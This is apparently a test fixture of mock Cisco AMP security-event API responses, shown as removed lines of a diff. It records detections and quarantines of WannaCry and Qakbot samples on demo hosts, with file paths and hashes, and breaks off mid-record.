-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671599780921000,"timestamp":1610623726,"timestamp_nanoseconds":440000000,"date":"2021-01-14T11:28:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat 